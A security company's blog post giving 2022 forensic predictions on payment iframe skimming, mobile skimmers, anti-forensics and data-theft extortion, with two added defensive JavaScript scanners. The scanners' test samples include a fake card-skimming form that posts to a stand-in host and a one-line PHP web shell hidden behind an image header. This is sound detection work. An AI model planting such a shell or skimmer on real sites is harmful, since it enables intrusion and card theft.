
2022 Forensic Predictions

SecurityMetrics Forensic Investigators have witnessed the rise and fall of popular attack trends over 20 consecutive years.


Comparing 2021 with previous years, SecurityMetrics’ Forensic Investigators conducted more investigations of e-commerce environments than of point-of-sale (POS) environments.

Here are our 2022 Forensic Predictions.


1. Payment iframe breach via browser vulnerability or zero-day attack

SecurityMetrics forensic investigators have continued to see a surge in iframe compromises. In the typical iframe compromise, a customer attempts to make a purchase on an e-commerce website but is shown an error message prompting them to re-enter their credit card information. The first entry goes to the attacker; the second goes to the payment processor.

However, we predict that there will be severe payment iframe breaches in which the attacker also completes the payment, driven by zero-day attacks. With such an exploit (especially one that runs as JavaScript in the browser), the more sophisticated attack would only need the customer to enter their information once: the attacker collects the payment data and then forwards it to the processor, so the transaction succeeds and the customer has no reason to suspect anything.

We also see all sorts of attacks against JavaScript stacks such as Node.js and AngularJS, where attackers are working hard to exploit vulnerabilities in these frameworks and the applications built on them.

We expect to see iframes broken through this method, where the attacker uses the browser itself to capture credit card data.
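A merchant-side integrity check that catches the two patterns described above: an extra card form rendered in the merchant's own page outside the provider's iframe (the "please re-enter your card" overlay), and data posted to or scripts loaded from an origin that is neither the merchant nor the processor. This is an added example, not SecurityMetrics tooling. The origins `https://shop.example.test` and `https://pay.example-psp.test`, the sample pages and the field-name patterns are constructed placeholders, and the attribute regexes are a triage heuristic rather than an HTML parser.

```javascript
// Added example, not SecurityMetrics code. Static integrity check for a checkout page
// that embeds a hosted payment iframe. Assumed placeholders: the merchant site is
// https://shop.example.test and its provider serves the iframe from PAYMENT_ORIGIN.
const PAYMENT_ORIGIN = "https://pay.example-psp.test";

// Attribute-level patterns: a triage heuristic, not an HTML parser.
const IFRAME_SRC = /<iframe\b[^>]*\ssrc\s*=\s*["']([^"']*)["']/gi;
const FORM_ACTION = /<form\b[^>]*\saction\s*=\s*["']([^"']*)["']/gi;
const SCRIPT_SRC = /<script\b[^>]*\ssrc\s*=\s*["']([^"']*)["']/gi;
const INPUT_TAG = /<input\b[^>]*>/gi;
// Input names or autocomplete tokens that mean "this field collects card data".
const CARD_FIELD = /card.?number|cc-number|cc-csc|cvv|cvc|expir/i;

function originOf(raw, pageUrl) {
  try {
    // Resolves relative ("/order") and protocol-relative ("//cdn...") references.
    return new URL(raw, pageUrl).origin;
  } catch {
    return null; // javascript:, malformed, or no usable origin
  }
}

function scanCheckout(html, pageUrl) {
  const pageOrigin = new URL(pageUrl).origin;
  const trusted = new Set([pageOrigin, PAYMENT_ORIGIN]);
  const attrs = (re) => [...html.matchAll(re)].map((m) => m[1]);
  const findings = [];

  // 1. Every iframe must come from the provider or the merchant itself.
  for (const src of attrs(IFRAME_SRC)) {
    if (!trusted.has(originOf(src, pageUrl))) findings.push({ kind: "iframe-origin", value: src });
  }
  // 2. Card fields in the merchant DOM itself are the "please re-enter your card" overlay:
  //    with a hosted iframe, the merchant page should never render them.
  for (const tag of html.match(INPUT_TAG) || []) {
    if (CARD_FIELD.test(tag)) findings.push({ kind: "card-input-in-page", value: tag });
  }
  // 3. Forms posting anywhere except the merchant or the provider.
  for (const action of attrs(FORM_ACTION)) {
    if (!trusted.has(originOf(action, pageUrl))) findings.push({ kind: "form-action", value: action });
  }
  // 4. Third-party scripts: each one is a candidate skimmer loader and deserves review.
  for (const src of attrs(SCRIPT_SRC)) {
    if (!trusted.has(originOf(src, pageUrl))) findings.push({ kind: "third-party-script", value: src });
  }
  return findings;
}

// Constructed sample pages (not captured from any real incident).
const PAGE_URL = "https://shop.example.test/checkout";
const CLEAN_PAGE = `
<form action="/order" method="post"><input name="email" type="email"></form>
<iframe src="https://pay.example-psp.test/card-form?merchant=123"></iframe>
<script src="/static/checkout.js"></script>`;
const TAMPERED_PAGE = CLEAN_PAGE + `
<div class="error">Card declined, please re-enter your details</div>
<form action="https://cdn-stats.example.invalid/collect" method="post">
  <input name="cardNumber" autocomplete="cc-number"><input name="cvv" maxlength="4">
</form>
<script src="//cdn-stats.example.invalid/app.js"></script>`;

console.log(scanCheckout(CLEAN_PAGE, PAGE_URL));
console.log(scanCheckout(TAMPERED_PAGE, PAGE_URL));
```

Run this against a fresh fetch of the live checkout page on a schedule, from outside the web server, so that a server-side compromise that rewrites the page also changes what the scan sees. The same allowlist can be expressed as a Content-Security-Policy (`frame-src`, `form-action`, `script-src`) so the browser enforces it at request time; the scan is the detective control that tells you when the policy or the page has been changed.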


2. Mobile devices will become a primary target of credit card skimmers

Our second prediction for the coming year is that we will start seeing mobile devices as the primary targets of skimmers (and other types of data breaches).

Mobile device processing was once considered to be immune to data breaches.

That’s not the case anymore, especially on the consumer side. There was a hacker tool called Enter, designed to insert a skimmer on the checkout page inside a desktop browser. Recently, this tool has been reconfigured (or remade) as Mobile Enter, which is specifically designed to run on a phone instead of a desktop.

With the increase of online shopping occurring on phones, we’ll see more attacks and exploits on mobile devices.

3. Increase in use of anti-forensic techniques of credit card skimmers

The harder it is for a forensic analyst to detect an attack, the longer that attack goes on, with even more cardholder data being lost.

The range of tools being used covers data hiding (e.g., rootkits, encryption, steganography), artifact wiping (e.g., disk cleaners, free-space and memory cleaners, prophylactic wiping), trail obfuscation (e.g., log cleaners, spoofing, misinformation, zombied accounts, Trojan commands), and attacks against the computer forensics (CF) process and tools (e.g., file signature altering, hash fooling, nested directories).

We’re going to see more of this occurring on the mobile platform.

This is even more reason to regularly update your defensive tools (e.g., antivirus): vendors add detection for these techniques as they are discovered, so an out-of-date tool will miss the newer ones.
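A minimal triage routine for the last category above, file signature altering, as an added example (not SecurityMetrics code). It compares each file's claimed extension with its magic bytes and then looks for script markers inside files whose signature is valid, because a web shell with a genuine image header pasted on the front passes a signature check on its own. The samples are constructed byte strings, and the magic-byte table and marker strings are an illustrative subset.

```javascript
// Added example, not SecurityMetrics code. Triage for "file signature altering":
// compare a file's claimed extension with its magic bytes, then look for script
// markers inside files whose signature is valid.
const MAGIC = [
  { type: "pdf", bytes: [0x25, 0x50, 0x44, 0x46] },                          // %PDF
  { type: "png", bytes: [0x89, 0x50, 0x4e, 0x47, 0x0d, 0x0a, 0x1a, 0x0a] },
  { type: "jpg", bytes: [0xff, 0xd8, 0xff] },
  { type: "gif", bytes: [0x47, 0x49, 0x46, 0x38] },                          // GIF8
  { type: "zip", bytes: [0x50, 0x4b, 0x03, 0x04] },                          // PK.. (also docx/xlsx/jar)
  { type: "exe", bytes: [0x4d, 0x5a] },                                      // MZ
];
// Extensions that legitimately share a signature with another type.
const ALIAS = { jpeg: "jpg", docx: "zip", xlsx: "zip", jar: "zip", dll: "exe" };
// Strings that have no business inside an image or document body (illustrative subset).
const CODE_MARKERS = ["<?php", "<script", "eval(", "base64_decode("];

function detectType(buf) {
  const hit = MAGIC.find((m) => buf.length >= m.bytes.length && m.bytes.every((b, i) => buf[i] === b));
  return hit ? hit.type : "unknown";
}

function classify(name, buf) {
  const claimed = (name.split(".").pop() || "").toLowerCase();
  const actual = detectType(buf);
  const text = buf.toString("latin1"); // byte-preserving view for substring search
  const markers = CODE_MARKERS.filter((m) => text.includes(m));
  let verdict;
  if (actual === "unknown") verdict = "unknown-signature"; // text, encrypted, or header wiped
  else if (actual !== (ALIAS[claimed] ?? claimed)) verdict = "mismatch";
  else verdict = markers.length ? "match-with-embedded-code" : "match";
  return { name, claimed, actual, markers, verdict };
}

function triage(samples) {
  return samples.map(([name, buf]) => classify(name, buf));
}

// Constructed samples (not evidence from any case).
const SAMPLES = [
  ["report.pdf", Buffer.from("%PDF-1.7\n%\xe2\xe3\xcf\xd3\n1 0 obj", "latin1")],
  ["invoice.pdf", Buffer.from([0x4d, 0x5a, 0x90, 0x00, 0x03, 0x00, 0x00, 0x00])], // PE header renamed
  ["logo.png", Buffer.concat([
    Buffer.from([0x89, 0x50, 0x4e, 0x47, 0x0d, 0x0a, 0x1a, 0x0a]),             // real PNG header...
    Buffer.from('<?php eval(base64_decode($_POST["c"])); ?>'),                 // ...over a web shell
  ])],
  ["notes.txt", Buffer.from("plain text, nothing to see")],
];

console.log(triage(SAMPLES));
```

A mismatch or an embedded-code hit is a reason to pull the file for manual review, not a conviction; an unknown signature is equally interesting on a web root where every file should be an image, script or document of a known type.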

4. Rise of ransomware without encryption

Ransomware traditionally will lock a computer and encrypt its files. If you want to access your files again, you have to pay the ransom.

However, there will be a shift away from solely encrypting files and toward stealing them and holding their confidentiality for ransom.

Hackers will disclose that they’ve captured your data, and if you don’t want your competitors to receive this information, for this information to be publicly disclosed, or for the sensitive information to be sold on the dark web, you will need to pay the ransom.

This shift is because more businesses have been following cyber security best practices, ensuring that they have backups that are current and disconnected from their network.

Because of this, some organizations never have to pay to recover their files, so attackers have moved on to extortion over the stolen data.

In one case, we saw that a company paid to have their data unlocked, then paid to have the attackers not publish the data. They then came back six months later saying something like “We still have your data, we’re going to need another X amount of Bitcoin to keep this information confidential.” The bad thing is that they still have your data and could continue requesting more money.

If you want to learn more about these predictions, check out this webinar. 

Forensic Webinar: What Happened in 2019 & Predictions for 2020


How did we do on our predictions from 2021? Here are last year’s predictions and results.

Prediction 1. Hackers will increasingly target payment iFrames 

There seemed to be the idea that if you put an iframe in place, that was enough of a security enhancement that you could consider your data secure. To a hacker, iframes were just another opportunity. 

We did see all kinds of iframe attacks, including a complete bypass of the iframe. In a lot of iframe attacks, the threat actors would come in posing as regular customers, grab the card data, and waltz right back out with it. 

Now, don't get us wrong, iframes are still a very important part of your layered security and we're not discouraging the use of iframes. In fact, we encourage you to use iframes. They can be very secure. But you also need to protect your iframes. Putting an iframe on a website that is not itself secure is like putting a safe in your house but not locking your front door. You still want to make sure your front door is locked.


Prediction 2. Increases in domain name obfuscation hacks

Domain name obfuscation hacks exploit Unicode, which encodes the symbols of many writing systems, including Greek, Latin, and Cyrillic. Some of these characters are visually indistinguishable from Latin letters: an “O” in each of these scripts looks the same but is encoded differently, so a URL can look identical to the real one yet direct the browser to a totally different website.

This year, we found several online tools that assisted hackers with obfuscation hacks. We found a manual that was created to help people learn how to hack using Unicode. It was a great tutorial written in simple language that was easy to follow. 

We also found a tool where you simply cut and paste the URL you want to imitate, and the tool generates all sorts of look-alike options to choose from. Visually each URL looks the same as the original, but the computer resolves it differently because it contains Unicode characters. The tool then offers to register the domain and sets you up to use phishing techniques.


Prediction 3. Increases in slim skimming

Slim skimming is where attackers create a small electronic device that slips right between the reader and the credit card (vs. the old-school, bulky skimmer to a gas pump or an ATM). 

We nailed this one. 

These attacks have increased and they are very hard to detect. There's no hint that anything is wrong because these devices are so small (a few centimeters across) that you can’t see them on the card readers. 

This has been frustrating for merchants, as many of them replaced and updated their gas pump card readers for EMV without realizing that the new readers could be solving a problem for the attackers by providing a convenient power supply for the skimmer. But the defense on this one really falls on the merchant to monitor their card readers.


Prediction 4. An uptick in cryptocurrency thefts

This probably wasn’t a big stretch for anybody. Crypto scammers last year were able to garner $14 billion illicitly. That’s a 79% increase over 2020.

To look at the picture more accurately, of that $14 billion, only $3.2 billion was stolen directly from crypto exchanges and accounts, where attackers actually got in and mechanically moved the cryptocurrency out. The remaining $10.8 billion was taken by way of scams.

If you want to learn more about these outcomes, check out this webinar. 


By: David Ellis
VP, Investigations
CISSP, QSA, PFI